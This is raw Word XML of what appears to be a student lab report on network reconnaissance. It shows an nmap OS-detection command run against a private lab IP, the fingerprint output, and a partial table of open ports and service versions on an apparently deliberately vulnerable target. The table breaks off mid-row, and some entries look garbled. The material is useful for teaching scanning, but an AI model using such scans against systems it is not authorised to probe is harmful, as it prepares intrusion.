    <w:p w14:paraId="55000065" w14:textId="77777777" w:rsidR="00426D01" w:rsidRDefault="00426D01" w:rsidP="00426D01">
      <w:r>
        <w:t>Step 1: Use the -O option to detect the operating systems of devices on the network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A8F130" w14:textId="7C1C1135" w:rsidR="004C02AA" w:rsidRDefault="00426D01" w:rsidP="00526453">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -v -O YOUR_TARGET_IP_ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A0657A" w14:textId="28EC9693" w:rsidR="00426D01" w:rsidRDefault="00102026" w:rsidP="00102026">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00102026">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00102026">
        <w:t xml:space="preserve"> -v -O 192.168.160.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7159D5F4" w14:textId="69871B59" w:rsidR="00102026" w:rsidRDefault="0021530D" w:rsidP="00102026">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F311C9D" wp14:editId="35B84CEF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-239395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>691515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5730875" cy="6320790"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1614399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99371" name="Picture 16143993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2026">
        <w:t xml:space="preserve"> Output: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AEDBA1" w14:textId="77777777" w:rsidR="00015ADC" w:rsidRDefault="00015ADC" w:rsidP="00102026"/>
    <w:p w14:paraId="4F8EF958" w14:textId="77777777" w:rsidR="00015ADC" w:rsidRDefault="00015ADC" w:rsidP="00102026"/>
    <w:p w14:paraId="1D8C172F" w14:textId="77777777" w:rsidR="00015ADC" w:rsidRDefault="00015ADC" w:rsidP="00102026"/>
    <w:p w14:paraId="2BF93C3F" w14:textId="77777777" w:rsidR="00471793" w:rsidRDefault="00471793" w:rsidP="00471793">
      <w:r>
        <w:t>Task 3 - Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388FDB4" w14:textId="77777777" w:rsidR="00471793" w:rsidRDefault="00471793" w:rsidP="00471793">
      <w:r>
        <w:t>Target IP Address ENTER_YOUR_TARGET_IP_ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FC3691" w14:textId="09799A71" w:rsidR="00015ADC" w:rsidRDefault="00471793" w:rsidP="00102026">
      <w:r>
        <w:t>Operating System Details (ADD_YOUR_TARGET_OS_DETAILS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CB0B72" w14:textId="77777777" w:rsidR="00A471BB" w:rsidRDefault="00A471BB" w:rsidP="00CA7D89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA7D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target IP Address –</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8E7A11" w14:textId="77777777" w:rsidR="000929F4" w:rsidRDefault="000929F4" w:rsidP="00CA7D89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3682B635" w14:textId="4BF7BA2F" w:rsidR="00A471BB" w:rsidRDefault="00A471BB" w:rsidP="00CA7D89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000929F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Operating System Details </w:t>
      </w:r>
      <w:r w:rsidR="000929F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF854C5" w14:textId="77777777" w:rsidR="000929F4" w:rsidRPr="000929F4" w:rsidRDefault="000929F4" w:rsidP="00CA7D89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F94E605" w14:textId="77777777" w:rsidR="00A471BB" w:rsidRDefault="00A471BB" w:rsidP="00CA7D89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 00:0C:29:AB:A7:B8 (VMware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4934B2" w14:textId="77777777" w:rsidR="00A471BB" w:rsidRDefault="00A471BB" w:rsidP="00CA7D89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Device type: general purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79775332" w14:textId="77777777" w:rsidR="00A471BB" w:rsidRDefault="00A471BB" w:rsidP="00CA7D89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Running: Linux 2.6.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BFB0C1" w14:textId="77777777" w:rsidR="00A471BB" w:rsidRDefault="00A471BB" w:rsidP="00CA7D89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OS CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/o:linux:linux_kernel:2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A566F7" w14:textId="32401D9A" w:rsidR="00D20F75" w:rsidRDefault="00A471BB" w:rsidP="00D649CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>OS details: Linux 2.6.9 - 2.6.3</w:t>
      </w:r>
      <w:r w:rsidR="001A5B52">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3842B8E9" w14:textId="067475D2" w:rsidR="00D649CB" w:rsidRPr="00D649CB" w:rsidRDefault="00D649CB" w:rsidP="00D649CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D649CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Services Version with open ports (LIST ALL THE OPEN PORTS EXCLUDING HIDDEN PORTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53578901" w14:textId="01671ADB" w:rsidR="00A471BB" w:rsidRDefault="00A471BB" w:rsidP="00D20F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49CB" w14:paraId="7A073557" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66FAA8C4" w14:textId="16C2AB01" w:rsidR="00D649CB" w:rsidRPr="00C7153A" w:rsidRDefault="00C7153A" w:rsidP="00A471BB">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C7153A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39294803" w14:textId="723DBE8A" w:rsidR="00D649CB" w:rsidRPr="00C237DE" w:rsidRDefault="00C237DE" w:rsidP="00A471BB">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C237DE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>STATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FBC68A3" w14:textId="45F13C44" w:rsidR="00D649CB" w:rsidRDefault="005341B3" w:rsidP="00A471BB">
            <w:r w:rsidRPr="00E07B3B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SERVICE</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E07B3B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>VERSION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D649CB" w14:paraId="793A961C" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01963BAD" w14:textId="279BAB22" w:rsidR="00D649CB" w:rsidRDefault="007A254A" w:rsidP="00A471BB">
            <w:r>
              <w:t>21/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008522FA">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B7C1311" w14:textId="5AB4AF7F" w:rsidR="00D649CB" w:rsidRDefault="008522FA" w:rsidP="00A471BB">
            <w:r>
              <w:t>open ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61F46E5B" w14:textId="37A78EB3" w:rsidR="00D649CB" w:rsidRDefault="00217110" w:rsidP="00A471BB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>v</w:t>
            </w:r>
            <w:r w:rsidR="0077504A">
              <w:t>sftp</w:t>
            </w:r>
            <w:r>
              <w:t>d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">  2.</w:t>
            </w:r>
            <w:r w:rsidR="00465AD6">
              <w:t>3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D649CB" w14:paraId="28520DE7" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="579DB671" w14:textId="1734AFDD" w:rsidR="00D649CB" w:rsidRDefault="00465AD6" w:rsidP="00A471BB">
            <w:r>
              <w:t>22/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586CFA12" w14:textId="3F20CC53" w:rsidR="00D649CB" w:rsidRDefault="00C0153A" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">open ftp </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67C26964" w14:textId="576AE7D9" w:rsidR="00D649CB" w:rsidRDefault="00C0153A" w:rsidP="00A471BB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:r w:rsidR="00BA34E5">
              <w:t>SSH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00BA34E5">
              <w:t xml:space="preserve"> 4.7p1 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00BA34E5">
              <w:t>Debian</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00BA34E5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00CB5945">
              <w:t>8ubuntu1 ( protocol 2.</w:t>
            </w:r>
            <w:r w:rsidR="00C073E1">
              <w:t>0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A38DE" w14:paraId="70EF5B0C" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45A58024" w14:textId="475C377F" w:rsidR="009A38DE" w:rsidRDefault="00465AD6" w:rsidP="00A471BB">
            <w:r>
              <w:t>23/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7931D1A5" w14:textId="414AB72F" w:rsidR="009A38DE" w:rsidRDefault="00C073E1" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">Open telnet </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0744AEB7" w14:textId="26AB79C2" w:rsidR="009A38DE" w:rsidRDefault="00C073E1" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>telnet</w:t>
            </w:r>
            <w:r w:rsidR="00CC4D67">
              <w:t>d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A38DE" w14:paraId="20C2C447" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="132843D0" w14:textId="015A15BE" w:rsidR="009A38DE" w:rsidRDefault="00C0153A" w:rsidP="00A471BB">
            <w:r>
              <w:t>25/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0ABE3A76" w14:textId="6FE76490" w:rsidR="009A38DE" w:rsidRDefault="00CC4D67" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">open </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B0217D">
              <w:t>smtp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ED587AD" w14:textId="3CD4694E" w:rsidR="009A38DE" w:rsidRDefault="00B0217D" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">Postfix </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>smtpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A38DE" w14:paraId="34AAC79C" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D48B856" w14:textId="21748F16" w:rsidR="009A38DE" w:rsidRDefault="00B0217D" w:rsidP="00A471BB">
            <w:r>
              <w:t>53/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00127222">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59D48CB0" w14:textId="7E99DEC5" w:rsidR="009A38DE" w:rsidRDefault="00C65148" w:rsidP="00A471BB">
            <w:r>
              <w:t>op</w:t>
            </w:r>
            <w:r w:rsidR="008759A9">
              <w:t>en domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A2626C9" w14:textId="769020E3" w:rsidR="00057241" w:rsidRDefault="008759A9" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">ISC BIND </w:t>
            </w:r>
            <w:r w:rsidR="00057241">
              <w:t>9.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A38DE" w14:paraId="77ED2E25" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="018B9600" w14:textId="5F1BDFC6" w:rsidR="00127222" w:rsidRDefault="00127222" w:rsidP="00A471BB">
            <w:r>
              <w:t>80/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63063BBD" w14:textId="0A62EA06" w:rsidR="009A38DE" w:rsidRDefault="00E669BE" w:rsidP="00A471BB">
            <w:r>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidR="00057241">
              <w:t xml:space="preserve">pen </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">http </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="012EB548" w14:textId="4F13817D" w:rsidR="009A38DE" w:rsidRDefault="001C3860" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">Apache </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>httpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2.2.8((</w:t>
            </w:r>
            <w:r w:rsidR="00327336">
              <w:t>Ubuntu) DAV/2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A38DE" w14:paraId="35C5F334" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="769A3CF0" w14:textId="4569C3B0" w:rsidR="009A38DE" w:rsidRDefault="00127222" w:rsidP="00A471BB">
            <w:r>
              <w:t>111/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1620A8CB" w14:textId="6025068F" w:rsidR="009A38DE" w:rsidRDefault="00206327" w:rsidP="00A471BB">
            <w:r>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidR="0052349D">
              <w:t xml:space="preserve">pen </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00802759">
              <w:t>rpcbind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DF832E8" w14:textId="6D17FA1B" w:rsidR="009A38DE" w:rsidRDefault="0059242A" w:rsidP="00A471BB">
            <w:r>
              <w:t>2 (RPC #100000</w:t>
            </w:r>
            <w:r w:rsidR="0037082A">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A38DE" w14:paraId="6AA36F9A" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78F4E62D" w14:textId="6345C974" w:rsidR="009A38DE" w:rsidRDefault="00127222" w:rsidP="00A471BB">
            <w:r>
              <w:t>139/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662F44E8" w14:textId="63701A15" w:rsidR="009A38DE" w:rsidRDefault="00206327" w:rsidP="00A471BB">
            <w:r>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidR="0052349D">
              <w:t xml:space="preserve">pen </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00802759">
              <w:t>net</w:t>
            </w:r>
            <w:r w:rsidR="00D44D40">
              <w:t>bios-ssn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B98C1DF" w14:textId="77777777" w:rsidR="009A38DE" w:rsidRDefault="0037082A" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">Samba </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>smbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 3.X – 4.</w:t>
            </w:r>
            <w:r w:rsidR="007430C5">
              <w:t>X</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E735C29" w14:textId="5DB4F292" w:rsidR="007430C5" w:rsidRDefault="007430C5" w:rsidP="00A471BB">
            <w:r>
              <w:t>(workgroup:</w:t>
            </w:r>
            <w:r w:rsidR="00671D26">
              <w:t xml:space="preserve"> WORKGROUP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A38DE" w14:paraId="1045BAB4" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7406C52A" w14:textId="1F09049E" w:rsidR="009A38DE" w:rsidRDefault="00B64461" w:rsidP="00A471BB">
            <w:r>
              <w:t>445/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42C6D1F8" w14:textId="64D30E1C" w:rsidR="009A38DE" w:rsidRDefault="00D44D40" w:rsidP="00A471BB">
            <w:r>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidR="0052349D">
              <w:t>pen</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>netbios-ssn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="665E51BD" w14:textId="2B7805CF" w:rsidR="001123A2" w:rsidRDefault="001123A2" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">Samba </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>smbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 3.X – 4.X</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6071FEB8" w14:textId="37DAA130" w:rsidR="001123A2" w:rsidRDefault="001123A2" w:rsidP="00A471BB">
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>workgroup:WORKGROUP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A38DE" w14:paraId="6FD91D88" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EB99D0D" w14:textId="27B3ED4F" w:rsidR="009A38DE" w:rsidRDefault="00B64461" w:rsidP="00A471BB">
            <w:r>
              <w:t>512/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41CADC01" w14:textId="76042561" w:rsidR="009A38DE" w:rsidRDefault="00206327" w:rsidP="00A471BB">
            <w:r>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidR="0052349D">
              <w:t xml:space="preserve">pen </w:t>
            </w:r>
            <w:r w:rsidR="00460387">
              <w:t>exe</w:t>
            </w:r>
            <w:r w:rsidR="00A041F4">
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E66FBDD" w14:textId="04824A3F" w:rsidR="009A38DE" w:rsidRDefault="00F0358B" w:rsidP="00A471BB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Netkit-rsh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rexecd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A38DE" w14:paraId="38A0841D" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F25076" w14:textId="24A8D951" w:rsidR="009A38DE" w:rsidRDefault="000B5FF1" w:rsidP="00A471BB">
            <w:r>
              <w:t>513/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5505A37F" w14:textId="3A589832" w:rsidR="009A38DE" w:rsidRDefault="00206327" w:rsidP="00A471BB">
            <w:r>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidR="0052349D">
              <w:t xml:space="preserve">pen </w:t>
            </w:r>
            <w:r w:rsidR="00A041F4">
              <w:t xml:space="preserve">login </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="545E16E0" w14:textId="3676678C" w:rsidR="009A38DE" w:rsidRDefault="00F0358B" w:rsidP="00A471BB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>OpenBSD</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> or Solaris </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rlogind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A38DE" w14:paraId="25A83656" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B8D6689" w14:textId="68E6812E" w:rsidR="009A38DE" w:rsidRDefault="000B5FF1" w:rsidP="00A471BB">
            <w:r>
              <w:t>514/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1AA3608D" w14:textId="3F6C6D72" w:rsidR="009A38DE" w:rsidRDefault="00206327" w:rsidP="00A471BB">
            <w:r>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidR="0052349D">
              <w:t xml:space="preserve">pen </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00A041F4">
              <w:t>tcpwrapped</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08BBBF58" w14:textId="74084A2A" w:rsidR="009A38DE" w:rsidRDefault="009A38DE" w:rsidP="00A471BB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A6E30" w14:paraId="0690528E" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33D5129A" w14:textId="3CD2992F" w:rsidR="002A6E30" w:rsidRDefault="002A6E30" w:rsidP="00A471BB">
            <w:r>
              <w:t>1099/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10375F36" w14:textId="3E3D863B" w:rsidR="002A6E30" w:rsidRDefault="002A6E30" w:rsidP="00A471BB">
            <w:r>
              <w:t>open java-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rmi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="374C561C" w14:textId="60A8C8B9" w:rsidR="002A6E30" w:rsidRDefault="002A6E30" w:rsidP="00A471BB">
            <w:r>
              <w:t xml:space="preserve">GNU </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Classpath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>grmiregistry</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062108E" w14:paraId="54182DE3" w14:textId="77777777" w:rsidTr="00D649CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0767D837" w14:textId="63E7E237" w:rsidR="0062108E" w:rsidRDefault="0062108E" w:rsidP="00A471BB">
            <w:r>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00205D47">
              <w:t>24/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002F7B15">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
